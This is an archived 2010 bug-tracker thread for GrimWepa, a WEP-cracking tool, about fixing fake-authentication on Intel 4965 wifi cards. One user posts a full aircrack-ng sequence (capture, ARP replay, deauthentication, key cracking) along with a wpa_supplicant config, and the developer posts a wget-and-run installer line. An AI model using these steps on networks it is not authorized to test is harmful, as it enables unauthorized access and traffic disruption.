Closed GoogleCodeExporter closed 9 years ago
GoogleCodeExporter
commented
9 years ago I will second this. I have iwl4965 and this would be a very welcomed fix.
Thanks for all your hard work. I love the program.Original comment by tpzeg...@gmail.com on 5 Mar 2010 at 2:46
GoogleCodeExporter
commented
9 years ago It's good to know there's other people that would use this feature.
I've uploaded a new version (technically it's GrimWepa v1.01 Beta), it is my
second
stab at fixing the fake-auth on Intel 4965 chipsets.
To download the new install script, change permissions, and run the script
which will
download/install the new version of GrimWepa, copy/paste this:
{{{
wget http://grimwepa.googlecode.com/files/grimstall.sh
chmod 755 grimstall.sh
./grimstall.sh install
}}}
After starting the attack on the Intel 4965 chipset, and failing the
fake-authentication, GrimWepa *should* prompt to you that you are using the
Intel
4965 chipset, and then ask if you want to try the wpa_supplicant fix.
Select "Yes" and wait to see if your MAC address appears in the airodump-ng
window...
If this doesn't fake-authenticate for you, let me know!
If this DOES fake authenticate, let me know!!
After we have it working 100%, I'll remove the prompt so it automatically uses
wpa_supplicant.
Also, if it fails, *before you stop the attack*, see if GrimWepa created a
fake.conf
file in the same location as the .jar file.Original comment by der...@gmail.com on 5 Mar 2010 at 4:18
GoogleCodeExporter
commented
9 years ago I grabbed the beta and the workaround does not seem to be working. I can't get
any
IVs when using the 4965 chipset. I did notice, however, that the fake.conf file
that
is generated is not putting the wep_key0 variable in quotations. I am not sure
if
this makes a difference, but the variable is in quotations in all the scripts I
have
seen and in the example you posted above. Hope this helps. Thanks for a great
tool.Original comment by DavidCMo...@gmail.com on 5 Mar 2010 at 9:39
GoogleCodeExporter
commented
9 years ago I will also add that the workaround posted in the bt thread does work for me:
/dev/init.d/networking start
startx
airmon-ng start wlan0
airodump-ng mon0
ctrl+c
airodump-ng -c 'AP Channel' -w 'filename' --bssid 'AP bssid' mon0
make a file in the root (destkop) fake.conf:
network={
ssid="SSID" <-- change this in your target ssid
key_mgmt=NONE
wep_key0="fakeauth"
}
wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
aireplay-ng -3 -b 'AP bssid' mon0
aireplay-ng -0 1 -a 'AP bssid' mon0
aircrack-ng -b BSSID capfile-01.capOriginal comment by DavidCMo...@gmail.com on 5 Mar 2010 at 10:02
GoogleCodeExporter
commented
9 years ago @DavidCMolnar (and anyone else)...
Thanks for the feedback... I've made the change to include quotes and it's
attached
to this post...
I'm looking at the above script, and I think the problem is GrimWepa is trying
to use
wpa_supplicant on MON0 (the selected wifi device), rather than the original
WLAN0...
this could be quite a tricky situation!
The program should *now* prompt for the user to enter the wireless card that was
original used (wlan0 in most cases).
I'm going to use trial-and-error to solve this problem with the Intel 4965
workaround.
I hate to keep posting version-after-version on the site... and it's going to
be more
difficult to track which version works! I can keep attaching mini-revisions to
these
comments if it works for you guys... otherwise we could do the e-mail thing...
I would like to get immediate feedback, and hope to solve this problem
*tonight*!
DervOriginal comment by der...@gmail.com on 6 Mar 2010 at 1:56
Attachments:
GoogleCodeExporter
commented
9 years ago I think you nailed it with the latest patch! Thanks for the quick update. It
seems to
properly hook the wpa_supplicant and I am getting IVs using the ARP-Replay
attack
which I was not getting in V1.0. Thanks for the quick patch!Original comment by DavidCMo...@gmail.com on 6 Mar 2010 at 3:32
GoogleCodeExporter
commented
9 years ago Awesome! Glad to hear it works for you... I've already updated v1.0 in the
Downloads
section to include this revision. I'll try to wait for more positive reports
before
bragging about it :P
Now, for the questions:
* Does everyone who has the Intel 4965 wireless card use "wlan0" ?
* Is the Intel 4965 chipset popular because it a built-in wifi card on laptops?
Is
it safe to assume that people who have the iwl4965 card have it as wlan0?
* Should I automatically have GrimWepa assume the user has wlan0 as the
interface for
the Intel card, so as to speed up the cracking process?
* If you think there's a chance someone DOESN'T use wlan0, I can keep the
program as
it is: requiring user input before fake-authenticating...
* ..Otherwise, I will force the program to use wlan0 so you don't have to see
the
confirmation dialog every time.
I wish I knew these things and didn't have to ask :\
I hope you guys don't mind -- just trying to make it better suited for you!Original comment by der...@gmail.com on 6 Mar 2010 at 5:01
GoogleCodeExporter
commented
9 years ago Hi All,
Im one of the unlucky guys with an intel 4965 AGN :-) there are a couple of
points
here. (and my good Realtek card is at home and im on business trip for 2 months
)
first is the wpa_supplicant workaround present in the latest version 1.10a5.jar
?
Because i start it with the -v switch and i dont see any output in the
commandline
log that the wpa_supplicant is started. I also don't see any association in the
airodump window.
in version 1.0 its asking for the wlan0 interface but its not working for my
configuration .. (have the latest svn from aircrack ) by doing it the old
fashioned
way it works. but honestly i hate typing
2) question ... does anybody know if it is confirmed that with Version > 1573
SVN
aircrack the fake auth is working without the wpa_*****ant stuff.
thanks folks
i appreciate feedback
Joe Original comment by icq70...@gmail.com on 2 Jun 2010 at 10:39
Original issue reported on code.google.com by
der...@gmail.comon 2 Mar 2010 at 3:03